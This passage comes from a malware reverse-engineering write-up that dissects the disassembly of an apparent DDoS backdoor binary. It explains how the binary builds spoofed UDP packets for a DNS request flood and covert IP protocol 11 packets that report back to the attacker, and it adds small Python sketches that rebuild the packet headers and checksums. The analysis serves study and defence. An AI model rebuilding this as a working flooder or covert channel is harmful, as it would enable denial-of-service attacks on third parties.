checked (much like in previous functions). Firstly, LongL is checked to
be non-zero, and then 0xfffff97c(%ebp) to be <= 0. 0xfffff97c(%ebp) was
recently set to 0 (this check probably occurs within a loop so only the
first iteration would be 0).
If both of these conditions are true:
0x80496a5: movl 0x38(%ebp),%ebx
0x80496a8: pushl %ebx
0x80496a9: call 0x804bf80
BufferA is pushed and gethostbyname() is called. This exact same code
has been seen several times before. If gethostbyname() fails, a
sleep(600) is done, and %esi is set to 1. If it succeeds, the first IP
address of the hostname in BufferA is copied to 0xfffff9b4(%ebp). This
address is then copied:
0x80496e6: movl %eax,0x10(%edi)
0x80496e9: movl %eax,0xfffffddc(%ebp)
Looking back, %edi should be 0xfffff9d8(%ebp). So the IP address is
copied into 0xfffff9e8(%ebp). The address is also copied into
0xfffffddc(%ebp).
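Since all of these locations are %ebp-relative, it helps to turn the
displacements into signed numbers and measure them against the start of
the buffer. A Python sketch, where disp is a made-up helper name:

```python
def disp(value):
    """Interpret a 32-bit displacement such as 0xfffff9d8 as signed."""
    return value - (1 << 32) if value & 0x80000000 else value

base = disp(0xFFFFF9D8)                       # %edi, start of the buffer
offsets = {
    "0x10(%edi)": disp(0xFFFFF9E8) - base,    # where the address was copied
    "0xfffff9ec": disp(0xFFFFF9EC) - base,    # held in 0xfffff988(%ebp)
    "0xfffff9f4": disp(0xFFFFF9F4) - base,    # held in 0xfffff984(%ebp)
    "0xfffffdd8": disp(0xFFFFFDD8) - base,    # the word set to 2 earlier
}
print(base, offsets)
```

If the buffer turns out to hold an IP packet, 16 is the destination
address, 20 is the first byte after a 20 byte IP header, and 28 is the
first byte after a further 8 byte header. The 1024 byte gap up to
0xfffffdd8(%ebp) matches the 0x400 passed to memset().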
Another interesting thing to happen:
0x80496ef: movl $0x9c40,0xfffff97c(%ebp)
This same number has been seen in other functions as a 'counter' that
is set to 0x9c40 after each successful gethostbyname(). It is
decremented at timed intervals in other functions, and when it reaches
0 the gethostbyname() is redone. Looking at 0x804969c, this function
will most probably be identical in operation.
We then exit out of the above conditionals and continue:
0x80496fc: testl %esi,%esi
0x80496fe: jne 0x8049694
%esi was earlier xorl'd to 0, and should only be 1 if gethostbyname()
was called and failed (as seen in other functions).
If %esi is 0:
%esi is interestingly re-xorl'd to 0. This might indicate it forms
a new purpose for the remainder of this conditional.
A new conditional:
0x8049708: cmpl $0x0,0x34(%ebp)
0x804970c: jne 0x8049723
Once again, checking LongL. If it is 0:
0x804970e: leal 0xfffff9b8(%ebp),%eax
0x8049714: pushl %eax
0x8049715: call 0x804ce8c
0x804971a: movl %eax,0xfffffddc(%ebp)
0x804ce8c is an inet_addr() call, and 0xfffff9b8(%ebp) was earlier dot
quadded by the sprintf() call at 0x804963d. The resultant long is
placed into 0xfffffddc(%ebp).
Regardless of LongL:
0x8049723: movl 0xfffff978(%ebp),%edx
0x8049729: addl $0xfffffde8,%edx
0x804972f: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049733: pushl %eax
0x8049734: pushl %edx
0x8049735: movl 0xfffff984(%ebp),%ebx
0x804973b: pushl %ebx
0x804973c: call 0x805652c
The call to 0x805652c is unknown, but was briefly looked at in
Data_Function_B. It was ascertained there that it formed a data copy
loop. In looking back at the analysis done at Data_Function_B, this
call *should* result in *0xffffffdc(%ebp,%esi,4) bytes being copied
from *0xfffff978(%ebp)+$0xfffffde8 to *0xfffff984(%ebp).
Looking up all these values reveals that 0xffffffdc(%ebp) is the list
of 9 longs, each with values between 20 and 25. 0xfffff978(%ebp) was
earlier quite oddly set to %ebp. This means that %ebp + $0xfffffde8 is
quite effectively the stack address 0xfffffde8(%ebp)! It should be
noted that 0xfffff978(%ebp) will quite likely change for later
iterations.
0xfffffde8(%ebp) is the beginning of the 500 bytes of data copied at
the very beginning of this network function.
The destination for the data copy is unknown at this point in time.
This function is followed by a random() call with:
0x8049749: movl $0xff,%ebx
0x804974e: cltd
0x804974f: idivl %ebx,%eax
0x8049751: movl 0xfffff984(%ebp),%ebx
0x8049757: movb %dl,(%ebx)
This should put a random byte (with exception of 0xFF) into the
location pointed to by 0xfffff984(%ebp). Interestingly enough, this is
the first byte of the data that we just finished copying!
The same process is done again, but this time:
0x804976c: movb %dl,0x1(%ebx)
It fills in the second byte of that same data buffer with another
random value.
A parameter check:
0x804976f: cmpl $0x0,0x2c(%ebp)
0x8049773: jne 0x804978c
0x8049775: cmpl $0x0,0x30(%ebp)
0x8049779: jne 0x804978c
This checks if LongJ and LongK are 0, if so:
We do the random() call with a MOD 0x7530. The result is placed
into %eax and execution is jumped to 0x8049796.
If LongJ or LongK is not 0:
0x804978c: movl 0x2c(%ebp),%eax
0x804978f: shll $0x8,%eax
0x8049792: addw 0x30(%ebp),%ax
The two parameters, LongJ and LongK make up the high and low order
bytes of %ax.
So depending if LongJ and LongK are 0, %ax has a random value (0 to
0x752f), and if either is non-zero, %ax is filled with their values.
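The selection can be written out as a small Python function. It models
random() with Python's own generator, so only the structure of the
choice is meaningful here; source_port is a made-up name.

```python
import random

def source_port(long_j, long_k, rng=random):
    """Pick the value that ends up in %ax before the byte swap."""
    if long_j == 0 and long_k == 0:
        # Stand-in for random() MOD 0x7530.
        return rng.randrange(1 << 31) % 0x7530
    # shll $0x8,%eax ; addw 0x30(%ebp),%ax
    return ((long_j << 8) + long_k) & 0xFFFF

print(source_port(0x04, 0x00), source_port(0, 0) < 0x7530)
```

One side effect of this design is that a fixed value of 0 cannot be
requested, since both parameters being 0 selects the random path.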
Once this is done:
0x8049796: xchgb %al,%ah
0x8049798: movl 0xfffff988(%ebp),%ebx
0x804979e: movw %ax,(%ebx)
%ax is effectively htons()'d, and the value placed into
*0xfffff988(%ebp). 0xfffff988(%ebp) was earlier set to
0xfffff9ec(%ebp). Other network functions have used this technique to
operate with ports. It is assumed 0xfffff9ec(%ebp) is a port, but
still no further assumptions can be made since we still don't know if
we are making a UDP or TCP packet, the port could be destination or
source, or even a sockaddr port (has been done before).
Continuing:
0x80497a1: movl 0xfffff988(%ebp),%ebx
0x80497a7: movw $0x3500,0x2(%ebx)
This is interesting, primarily because it is 2 bytes after the 'port'
number we just placed via 0xfffff988(%ebp). 0x35 is easily recognisable
as port 53. We were earlier dealing with the same data that was used in
Network_Function_B for DNS based purposes, so it is quite likely that
this is the destination port, and the previous was a source port, all
being constructed once again in a 'packet buffer'.
Still with no hard evidence, we continue:
0x80497ad: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80497b2: addw $0x8,%ax
0x80497b6: xchgb %al,%ah
0x80497b8: movw %ax,0x4(%ebx)
0x80497bc: movw $0x0,0x6(%ebx)
Firstly, %ax is filled with one of those 9 20-25 values which start at
0xffffffdc. %esi is obviously used as an index which is initially 0.
8 is added to the value, then htons()'d, and finally stored at
0x4(%ebx). A 0 word is placed after that.
This almost confirms that a udp header was just created. Evidence
being the addition of 8 to the number (which was used as a datasize in
Network_Function_B) and the placement into what would be the length
field of the udp header. The 0 would correspond to the checksum.
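Putting the four stores together, the 8 bytes at 0xfffff9ec(%ebp) would
look like this if it really is a UDP header. A Python sketch with a
sample source port and the first of the 9 data lengths (21):

```python
import struct

def udp_header(src_port, data_len):
    """8 byte UDP header as it appears to be laid out via %ebx."""
    return struct.pack(
        "!HHHH",
        src_port,        # (%ebx): random, or LongJ/LongK
        53,              # 0x2(%ebx): movw $0x3500 stores bytes 00 35
        data_len + 8,    # 0x4(%ebx): payload plus the 8 byte header
        0,               # 0x6(%ebx): checksum left as 0
    )

hdr = udp_header(1024, 21)
print(hdr.hex())
```

A zero UDP checksum is legal over IPv4 (it means "not computed"), which
would explain why no pseudo header work appears for this packet.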
A series of checks (in an OR line-up):
0x80497c2: cmpb $0x0,0xfffff99c(%ebp)
0x80497c9: jne 0x804983c
0x80497cb: cmpb $0x0,0xfffff998(%ebp)
0x80497d2: jne 0x804983c
0x80497d4: cmpb $0x0,0xfffff994(%ebp)
0x80497db: jne 0x804983c
0x80497dd: cmpb $0x0,0xfffff990(%ebp)
0x80497e4: jne 0x804983c
The locations checked correspond to the local copies of the parameters
(which were duplicated at the very beginning of the function). The
exact parameters are believed to be: LongE, LongF, LongG, LongH. If
all of these are zero, a long series of random() calls are done in
conjunction with setae's (setnc's) / andb masks. The outcome of this
process is the creation of 4 bytes 0-254. These bytes are placed
into 0xfffff9e4(%ebp) to 0xfffff9e7(%ebp).
If any of the above checks are non-zero:
0x804983c: movb 0xfffff99c(%ebp),%bl
0x8049842: movb %bl,0xfffff9e4(%ebp)
0x8049848: movb 0xfffff998(%ebp),%bl
0x804984e: movb %bl,0xfffff9e5(%ebp)
0x8049854: movb 0xfffff994(%ebp),%bl
0x804985a: movb %bl,0xfffff9e6(%ebp)
0x8049860: movb 0xfffff990(%ebp),%bl
0x8049866: movb %bl,0xfffff9e7(%ebp)
The values are quite simply placed directly into those memory
locations instead of random values.
Following on:
0x804986c: cmpl $0x0,0x34(%ebp)
0x8049870: jne 0x80498a2
LongL is checked, if it is 0:
0x8049872: movb 0xfffff9ac(%ebp),%bl
0x8049878: movb %bl,0xfffff9e8(%ebp)
0x804987e: movb 0xfffff9a8(%ebp),%bl
0x8049884: movb %bl,0xfffff9e9(%ebp)
0x804988a: movb 0xfffff9a4(%ebp),%bl
0x8049890: movb %bl,0xfffff9ea(%ebp)
0x8049896: movb 0xfffff9a0(%ebp),%bl
0x804989c: movb %bl,0xfffff9eb(%ebp)
A very similar data copy takes place, 4 bytes after the previous data
positions (it's fairly likely these will be IP addresses, but until
more packet details are uncovered, it's useless analysing them).
Now comes the packet details we've been waiting for:
0x80498a2: movb $0x45,(%edi)
The 0x45 is assumed to correspond to an ihl and ip version of an IP
header. Once again, we will assume a packet buffer is in the making.
%edi would be the starting point, and was earlier set to
0xfffff9d8(%ebp). This means the previous data copies to addresses
starting at 0xfffff9e4(%ebp) would correspond to the source address,
then the destination address. While the IP header protocol field has
not yet been set, a UDP header seems to be in place, along with a copy
of data into an appropriate udp-data position. We should expect to
see packet buffer configured as UDP.
A random() call followed by MOD 0x82 code is then done. The result
has 0x78 added and:
0x80498b5: movb %dl,0x8(%edi)
Is placed into the TTL position. This means any TTL will be between
120 and 249 (0x82 is 130, so the MOD result is 0 to 129).
Similar code again, this time the random number is MOD 255'd, then:
0x80498c5: movw %dx,0x4(%edi)
Directly placed into the IP ID field (note the lack of htons()).
0x80498c9: movb $0x11,0x9(%edi)
0x80498cd: movw $0x0,0x6(%edi)
Finally, we see the IP protocol field be set to 17 (UDP) as expected.
This is followed by the IP offset being set to 0.
Packet length calculations follow:
0x80498d3: movw 0xffffffdc(%ebp,%esi,4),%ax
0x80498d8: addw $0x1c,%ax
0x80498dc: xchgb %al,%ah
0x80498de: movw %ax,0x2(%edi)
The first line grabs the indexed data length (indexed by %esi). 0x1c
is added, this is the size of a 20 byte IP header plus an 8 byte UDP
header.
The value is htons()'d and stored into the IP header total length
field.
0x80498e2: movw $0x0,0xa(%edi)
0xa(%edi) corresponds to the checksum, so the above line sets it to 0.
The checksum process is then believed to start:
0x80498e8: movl $0x14,%edx
Once again, forming a loop of 0x14 iterations (to process 20 bytes).
The starting position is set to 0xfffff9d8(%ebp) which is the start of
the packet buffer. Eventually, we see:
0x8049951: movw %ax,0xa(%edi)
Which sets the IP checksum. This is followed by a call setup:
0x8049955: pushl $0x10
0x8049957: leal 0xfffffdd8(%ebp),%eax
0x804995d: pushl %eax
0x804995e: pushl $0x0
0x8049960: movl 0xffffffdc(%ebp,%esi,4),%eax
0x8049964: addl $0x1c,%eax
0x8049967: pushl %eax
0x8049968: leal 0xfffff9d8(%ebp),%eax
0x804996e: pushl %eax
0x804996f: movl 0xfffff98c(%ebp),%ebx
0x8049975: pushl %ebx
0x8049976: call 0x8056c3c
This is a simple sendto() call. It uses 0xfffff9d8(%ebp) as the send
buffer (as expected), and 0xfffff98c(%ebp) as the socket. 0x1c plus
the data amount is the total number of bytes to be sent (as expected).
0xfffffdd8(%ebp) marks a sockaddr structure which was setup under an
AF_INET family, with a port of 0, and address of the destination host.
Following this call, we see identical code to that which has been seen
before. The code responsible for timing sleep()'s and resolving of
BufferA (if chosen):
0x804997e: cmpl $0x0,0x28(%ebp)
0x8049982: jne 0x8049990
0x8049984: pushl $0x12c
0x8049989: call 0x80555b0
0x804998e: jmp 0x80499af
0x8049990: movl 0x28(%ebp),%ebx
0x8049993: cmpl %ebx,0xfffff980(%ebp)
0x8049999: jne 0x80499bc
0x804999b: pushl $0x12c
0x80499a0: call 0x80555b0
0x80499a5: movl $0x0,0xfffff980(%ebp)
0x80499af: decl 0xfffff97c(%ebp)
0x80499b8: jmp 0x80499c2
Basically, if LongI is 0, it will usleep(0x12c). If not, it will check
LongI to see if it matches the value at 0xfffff980(%ebp). If it does,
it will usleep(0x12c), reset 0xfffff980(%ebp) back to 0, and decrement
0xfffff97c(%ebp) (a variable which upon reaching 0, indicates BufferA
should be re-gethostbyname()'d). This host resolution variable is
decremented if LongI is 0 as well.
If LongI is non-zero AND it does not equal the value at
0xfffff980(%ebp), then this value is simply incremented.
0x80499bc: incl 0xfffff980(%ebp)
0x80499c2: addl $0x32,0xfffff978(%ebp)
Several variables are incremented. The first is not recognised, and
has not been seen before [in fact does not seem to be used anywhere in
the function!??!]. The second adds 50 to 0xfffff978(%ebp). This is
the pointer to the data component of the packet. This effectively
changes the UDP packet's contents.
%esi's counter use now becomes clear:
0x80499c9: incl %esi
0x80499ca: cmpl $0x8,%esi
0x80499cd: jle 0x8049708
%esi is used to keep track of the 9 data type states. It will keep
the loop going (by jumping back to 0x8049708) until %esi hits 9. At
which time:
0x80499d3: jmp 0x8049694
Execution passes back further to cater for the gethostbyname()
section.
It should be remembered that 9 x 50 bytes of data (500 bytes) were
copied in the beginning of the function. Also 9 longs were copied.
This accounts for these 9 states, ensuring that it cycles through
each.
Disassembly Review:
This function seems related to Network_Function_B, both in complexity,
data, and purpose. The basic theme behind this function is to send
packets to a single server, using the octets from LongA, LongB, LongC,
and LongD. A source address can optionally be specified. If
LongE, LongF, LongG, and LongH are all 0, random source IP's will be
generated for every outgoing packet. If any of them are non-zero, then
they will be used as the source IP octets for every packet.
LongI seems to be used for timing, determining how many packets are sent
per second.
LongJ and LongK look to be used solely for setting the source port of
the attack. If they are both 0, a random source port 0-0x7530 will be
used.
LongL and BufferA are used in an identical way to the other network
functions. If LongL is 0, LongA-D are used as destination IP. If LongL
is non-zero, BufferA is used as a hostname to be looked up to obtain the
IP address.
The most interesting part of this function has been seen before in
Network_Function_B. That is, the cycling through of the 9 packet data
contents (and lengths). The purpose of which will surely be uncovered
in Network_Analysis_F.
Function Overview:
If Network_Function_B is indeed a DNS amplification attack as suspected,
then this attack is expected to consume bandwidth on a DNS serving
machine. It launches an attack against a single server, being able to
spoof DNS requests from random addresses.
Features of this attack:
* DNS request flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X seconds(minutes)!
* Completely random, or a single IP spoofed as source.
* Request source port can be manually set, or random.
* Attack speed is adjustable.
The network traffic generated by this function will be examined in
more detail in Network_Analysis_F.
h) Network_Function_F [0x8048f94] - (Network)
Known Usage:
function(Buffer1, Buffer2, Buffer3, number)
Guesses at purpose:
From the positioning of this function, it is believed it will be
responsible for some communications channel from this binary, to the
blackhat.
Naming Conventions:
Parameters will be given the following names:
function(IP_Address, BufferA, BufferB, DataAmount)
IP_Address is named as such since the buffer only looks to be modified
in one position at the moment. That is, in the case sections of the
"Core Functionality" where it is set to the destination IP of an
incoming packet.
Disassembly:
Straight into it:
0x8048fa0: pushl $0xff
0x8048fa5: pushl $0x3
0x8048fa7: pushl $0x2
0x8048fa9: call 0x8056cf4
0x8056cf4 has already been identified as a socket() call. Matching it
up to a C function call:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
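As a quick cross-check of that match-up, the pushed values can be compared against the constants exposed by Python's socket module. This is a small sketch that assumes the usual Linux values; the helper name decode_socket_args is made up for this example.

```python
import socket

# The three values pushed before the call, listed in C argument order
# (the last push, 0x2, is the first argument).
pushed = {"domain": 0x2, "type": 0x3, "protocol": 0xff}

names = {
    "domain": ("AF_INET", socket.AF_INET),
    "type": ("SOCK_RAW", socket.SOCK_RAW),
    "protocol": ("IPPROTO_RAW", socket.IPPROTO_RAW),
}

def decode_socket_args(args):
    """Return the symbolic name for each pushed value, or None if it differs."""
    return {key: (names[key][0] if int(names[key][1]) == value else None)
            for key, value in args.items()}

print(decode_socket_args(pushed))
```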
Next we check the result:
0x8048fae: movl %eax,0xffffffbc(%ebp)
0x8048fb4: cmpl $0xffffffff,%eax
0x8048fb7: je 0x8048fce
The socket number is placed into 0xffffffbc(%ebp). It is then checked
if it is -1 (fail) and if so, jumps to 0x8048fce, else:
0x8048fb9: movl 0x14(%ebp),%eax
0x8048fbc: addl $0x17,%eax
0x8048fbf: pushl %eax
0x8048fc0: call 0x805bd74
0x8048fc5: movl %eax,%esi
This function call is unknown, and disassembling it doesn't help to
uncover its purpose. It does not seem to do anything of much importance
so it will just be left as an unknown for now. As a parameter,
DataAmount+23 is passed and the return is recorded in %esi.
This value is tested:
0x8048fca: testl %esi,%esi
0x8048fcc: jne 0x8048fd8
If the return was 0, the network function returns with 0. Otherwise:
0x8048fd8: movl %esi,0xffffffc4(%ebp)
0x8048fdb: leal 0x14(%esi),%edi
0x8048fde: movl %edi,0xffffffc0(%ebp)
0x8048fe1: leal 0x16(%esi),%edi
0x8048fe4: movl %edi,0xffffffc8(%ebp)
%esi is obviously recorded, and a few pointers appear to be set up at
offsets of 20 and 22 bytes from it. These are also recorded.
0x8048fe7: movl 0x8(%ebp),%edi
The very first parameter, IP_Address (points to a buffer containing an
IP address) is copied to %edi. A slow (but simple) technique is then
used:
0x8048fea: movb (%edi),%al
0x8048fec: movb %al,0xc(%esi)
0x8048fef: movb 0x1(%edi),%al
0x8048ff2: movb %al,0xd(%esi)
0x8048ff5: movb 0x2(%edi),%al
0x8048ff8: movb %al,0xe(%esi)
0x8048ffb: movb 0x3(%edi),%al
0x8048ffe: movb %al,0xf(%esi)
This copies 4 bytes (the length of an IP address) from this
buffer to a buffer starting at 0xc(%esi). We do it all over again:
0x8049001: movb (%ebx),%al
0x8049003: movb %al,0x10(%esi)
0x8049006: movb 0x1(%ebx),%al
0x8049009: movb %al,0x11(%esi)
0x804900c: movb 0x2(%ebx),%al
0x804900f: movb %al,0x12(%esi)
0x8049012: movb 0x3(%ebx),%al
0x8049015: movb %al,0x13(%esi)
A quick look back at 0x8048f9d shows that %ebx should be equal to
*0xc(%ebp) (BufferA). Once again, more memory copying takes place,
continuing on from earlier.
A long setup and call is done:
0x8049018: movzbl 0x3(%ebx),%eax
0x804901c: pushl %eax
0x804901d: movzbl 0x2(%ebx),%eax
0x8049021: pushl %eax
0x8049022: movzbl 0x1(%ebx),%eax
0x8049026: pushl %eax
0x8049027: movzbl (%ebx),%eax
0x804902a: pushl %eax
0x804902b: pushl $0x806768a
0x8049030: leal 0xffffffd0(%ebp),%ebx
0x8049033: pushl %ebx
0x8049034: call 0x804f808
This code has been seen before, and simply uses sprintf() to form a
dotted quad located at 0xffffffd0(%ebp). The octets for this are taken
from a single buffer (that's something new), BufferA.
0x8049039: pushl %ebx
0x804903a: call 0x8049138
This function is unknown but looks to contain calls to gethostbyname()
and a data copying function that was seen earlier. Following a
successful gethostbyname() chain through the call shows it to return the
first IP address matching the hostname in the parameter. One must
question why this function is used here where a simple inet_addr() would
suffice (as had been done in earlier functions).
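To illustrate why a plain address conversion would be enough here, the round trip from 4 raw bytes to a dotted quad and back can be sketched as below. The format string "%d.%d.%d.%d" is an assumption about what sits at 0x806768a, and the function names are invented for the example; Python's inet_aton() stands in for inet_addr().

```python
import socket

def dotted_quad(octets):
    """Format four raw bytes the way the sprintf() call appears to (format assumed)."""
    return "%d.%d.%d.%d" % tuple(octets)

def quad_to_bytes(text):
    """Convert a dotted quad back to 4 bytes with no resolver lookup involved."""
    return socket.inet_aton(text)
```

Since the string is already a dotted quad, the conversion returns exactly the bytes that were formatted in the first place.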
The return is copied:
0x804903f: movl %eax,0xfffffff4(%ebp)
And some more values are placed nearby:
0x8049042: movw $0xa,0xfffffff2(%ebp)
0x8049048: movw $0x2,0xfffffff0(%ebp)
This could well be a sockaddr structure, if the port was set to 0xa?
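The guess can be checked against the usual sockaddr_in layout (2 byte family, 2 byte port, 4 byte address). The sketch below only models the first 8 bytes as an x86 machine would store them; the function name and the example address are made up, and the address is assumed to arrive already in network byte order.

```python
import struct

def sockaddr_in_bytes(family, port_word, addr):
    """Lay out the 8 bytes written from 0xfffffff0(%ebp) onwards.

    family and port_word are stored with movw, so they land little-endian;
    addr is the 4-byte value copied in as-is.
    """
    return struct.pack("<HH", family, port_word) + addr

raw = sockaddr_in_bytes(0x2, 0xa, bytes([192, 0, 2, 1]))
family = struct.unpack_from("<H", raw, 0)[0]   # sin_family, host order
port = struct.unpack_from(">H", raw, 2)[0]     # sin_port, read in network order
```

Read this way the family is 2 (AF_INET), and the word 0xa would appear as port 0x0a00 if interpreted in network byte order.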
Now the old favourites show their faces:
0x804904e: movb $0x45,(%esi)
0x8049051: movb $0xfa,0x8(%esi)
0x8049055: movb $0xb,0x9(%esi)
%esi was earlier set to the return value of the function call to 0x805bd74.
It is quite possible this function was some kind of malloc (or even malloc
itself!). Whatever it was, it would appear a packet buffer is being
created, starting at %esi. Firstly, we see the well known 0x45 IP
version / internet header length combination placed at the start. This
is followed by 0xfa being placed in the IP TTL section. Following this,
the IP protocol is set to 0xb (11). This is the same protocol that was
listened to in the main() section of this binary.
More packet setup:
0x804905c: movw 0x14(%ebp),%ax
0x8049060: addw $0x16,%ax
0x8049064: xchgb %al,%ah
0x8049066: movw %ax,0x2(%esi)
This places the value of DataAmount + 0x16, after being htons()'d,
into the total length field of the IP header.
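The xchgb trick is simply a byte swap of %ax, which on a little-endian machine has the same effect as htons(). A small sketch, with invented helper names, showing the bytes that end up at offset 2 of the packet:

```python
import struct

def xchg_al_ah(word):
    """Swap the two bytes of a 16-bit value, as xchgb %al,%ah does to %ax."""
    return ((word & 0xff) << 8) | ((word >> 8) & 0xff)

def total_length_field(data_amount):
    """Bytes stored at 0x2(%esi) for a given DataAmount."""
    value = (data_amount + 0x16) & 0xffff          # addw wraps at 16 bits
    return struct.pack("<H", xchg_al_ah(value))    # movw stores little-endian
```

For a DataAmount of 400 the stored bytes are the big-endian encoding of 422, which is what the IP header expects.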
0x804906a: movb $0x0,0x1(%esi)
0 is placed into the IP TOS field.
random() is called, the return xchg()'d:
0x804906e: call 0x8056058
0x8049073: xchgb %al,%ah
0x8049075: movw %ax,0x4(%esi)
And finally added into the IP ID field.
0x8049079: movw $0x0,0x6(%esi)
0x804907f: movw $0x0,0xa(%esi)
The IP offset is set to 0, same with the checksum.
Starting at 0x8049085, the checksum code appears to begin, looping
across 20 bytes (the IP header). Eventually:
0x80490cf: movw %ax,0xa(%edi)
The checksum is put into place, followed by:
0x80490d3: movl 0xffffffc0(%ebp),%edi
0x80490d6: movb $0x3,(%edi)
0xffffffc0(%ebp) was set much earlier to an offset of 0x14 bytes from
%esi, the start of the packet buffer (which is also where %edi pointed
in the checksum code above). This means it corresponds to the byte
directly after the IP header. A value of 0x3 is placed
into this position.
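For reference, the standard IP header checksum (the ones' complement sum described in RFC 1071) can be sketched as below. Whether the loop at 0x8049085 matches this exactly has not been verified here; the sketch only shows what a correct checksum over the 20 header bytes would look like.

```python
import struct

def ip_checksum(header):
    """Ones' complement of the ones' complement sum of all 16-bit words."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xffff) + (total >> 16)   # fold the carries back in
    return ~total & 0xffff
```

A handy property for checking captured traffic: running the same function over a header that already contains a correct checksum gives 0.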
A function call is set up and made:
0x80490d9: movl 0x14(%ebp),%edi
0x80490dc: pushl %edi
0x80490dd: movl 0x10(%ebp),%edi
0x80490e0: pushl %edi
0x80490e1: movl 0xffffffc8(%ebp),%edi
0x80490e4: pushl %edi
0x80490e5: call 0x805652c
Once again, 0x805652c is a call to some kind of data copy function.
Using a previous analysis of it, DataAmount bytes would be copied from
BufferB to *0xffffffc8(%ebp). The destination was earlier set to
0x16(%esi), which corresponds to 2 bytes after the IP header.
With the data copied, it seems a sendto() is next:
0x80490ed: pushl $0x10
0x80490ef: leal 0xfffffff0(%ebp),%eax
0x80490f2: pushl %eax
0x80490f3: pushl $0x0
0x80490f5: movl 0x14(%ebp),%eax
0x80490f8: addl $0x16,%eax
0x80490fb: pushl %eax
0x80490fc: pushl %esi
0x80490fd: movl 0xffffffbc(%ebp),%edi
0x8049100: pushl %edi
0x8049101: call 0x8056c3c
0xffffffbc(%ebp) is a stored copy of the socket() return earlier.
%esi is obviously the beginning of the packet buffer.
DataAmount + 0x16 (IP header + 2) is used as the amount of data to send.
And finally, 0xfffffff0(%ebp) turns out to indeed be a sockaddr
structure as initially believed.
The return from sendto() is examined:
0x8049109: cmpl $0xffffffff,%eax
0x804910c: jne 0x8049118
If it was -1 (error):
0x804910e: pushl %esi
0x804910f: call 0x805c290
0x8049114: xorl %eax,%eax
0x8049116: jmp 0x804912c
Else:
0x8049118: movl 0xffffffbc(%ebp),%edi
0x804911b: pushl %edi
0x804911c: call 0x8057160
0x8049121: pushl %esi
0x8049122: call 0x805c290
0x8049127: movl $0x1,%eax
The calls to 0x805c290 are unknown, but given the assumption of a malloc
or derivative being used before to return %esi, it is quite likely that
this call is a free(). 0x8057160 is a close() call, done on the socket
descriptor.
This network function then returns. It should be noted, if it returns
with %eax = 0 then an error occurred, if it is 1, it was successful.
Disassembly Review:
Finally, a simple, straight-forward network function! It would appear
that IP_Address is a pointer to a 4 byte buffer, containing the source
IP for the created packet. BufferA is a similar buffer, but with the
destination IP for the packet. BufferB is a pointer to a buffer with
DataAmount bytes to send as the contents of the packet.
It should be noted that 2 extra bytes exist between the IP header and
this "data". The first of which is set to 3, and the second of which
does not seem to be set at all. It is unclear what this byte is, or
would normally be for a sent packet.
Function Overview:
FINALLY! We have all the information to solve the many little puzzles
of this code (primarily, the first two case sections in the main()
section). This function appears to be the backchannel from this binary
to the blackhat, using covert IP protocol 11 packets.
A re-examination of the first two case sections needs to be done with
this new information. This analysis will follow this function, and is
named Re-Examination_A. The network traffic generated by this function
will be examined in Network_Analysis_B.
Re-Examination_A - A look back on case sections 1 and 2 from main().
Reason: With the analysis of Network_Function_A and Network_Function_F, new
information is available which opens the doors wide on some earlier
code whose purpose could not be identified.
Code Blocks Re-examined: 0x0804835c (Case section 1 - main())
0x080483f0 (Case section 2 - main())
New information: Network_Function_A and Network_Function_F
Analysis:
0x0804835c - Case section 1.
This code is initially quite complex. The main component of this section
appears to be the creation of a buffer starting at 0xfffff800(%ebp).
Initially we see Global_A placed into the first byte of this buffer. When
we look back through all the code, Global_A actually never gets set
anywhere! This assignment is either some kind of legacy code,
preparation for future modifications, or an error (unless someone else
can show where it is used!??!).
The next two bytes are obviously set to 1 and 7. The purpose of which is
unclear, but it is assumed to mean something to the client, perhaps an ID
for the binary, or a version.
PID_Var_B appears to be used next. This variable was used to store the
PID of any fork()'s that were running. In many cases (with the
packetting functions at least), more functions would refuse to run while
another was, all judged off PID_Var_B. The interesting thing is, if
PID_Var_B is 0, the next buffer byte is a 0, if not, it is a 1. This
*might* be some kind of indication for the blackhat to know that their
binary is doing something (busy?).
What backs this up, is if PID_Var_B is indeed non-zero (indicating
something is happening), the next byte of this buffer is set to Global_C.
What is Global_C again? It was a global variable that was always
assigned a number which seemed to be based upon the case statement.
Effectively, if for instance case section 10 was forked out and running,
Global_C would be 10. Same goes for many of the other case sections (the
long-term ones).
This means that this buffer now contains information about the "status"
of the binary. i.e. Is it running anything, and if so, what?
The code picks up again at 0x80483a7 where it prepares to call
Data_Manipulation_Function_B. This was proven before to be an encoding
/ decoding function (in this case it looks to be used to encode).
random() is called and seems to MOD 0xc9 ensuring a value between 0 and
200. This value is then +0x190 and passed to Network_Function_A in which
it has the effect of being the amount of data bytes to send.
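The arithmetic is easy to check. The sketch below (helper name invented) walks every possible remainder and also adds the 0x16 bytes that Network_Function_F places in front of the data, which lines up with the 422 to 622 byte total length listed in Network_Analysis_B.

```python
def covert_data_amount(rand_value):
    """Data amount for a given random() result: (r % 0xc9) + 0x190."""
    return (rand_value % 0xc9) + 0x190

amounts = [covert_data_amount(r) for r in range(0xc9)]
lengths = [a + 0x16 for a in amounts]   # IP total length once the header is added
```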
The first parameter passed to this function, 0xffffbb1c(%ebp) we will see
more of in case section 2 of this re-examination. It turns out, it is
used to contain the IP address(s) that Network_Function_A uses to send
off packets to. We will see how this buffer is constructed soon.
And finally, the second parameter passed to Network_Function_A,
0xffffbb20(%ebp). This buffer is the encoded data from
Data_Manipulation_Function_B. This means that the information passed by
this case section is encoded using Data_Manipulation_Function_B!
0x080483f0 - Case section 2.
This section is one of the more complex to follow, but uses simplistic
programming structures.
This section uses data from within the packet. This was already looked
at earlier. What was unknown at the time, was that the packet data would
have been encoded for network transfer. The data was then decoded and
used for this case section.
The most important part is right at the beginning. Global_B is set to
the third byte of the decoded buffer. This is an extremely important
variable. The analysis of Network_Function_A revealed that if Global_B
was 0, packets would be sent to just one IP. If Global_B was non-zero,
10 IP's would have data sent to them.
This all becomes important when one tries to work out what these IP
addresses actually are (we will definitely want to know!).
The source IP for Network_Function_F is also set to the destination IP of
the packet that resulted in this case section getting executed. (This
is a pretty handy trick since it eliminates interface scouring).
Back to the destination IP addresses:
random() is called at 0x8048440, with the result MOD 0xa, and is stored
in %edi.
A loop is formed from this point down to 0x8048532. The condition for
ending the loop appears to be that 10 iterations should have happened
(probably a for-loop). The counter for each iteration is %ebx.
The first conditional within this loop is:
0x8048454: cmpl %edi,%ebx
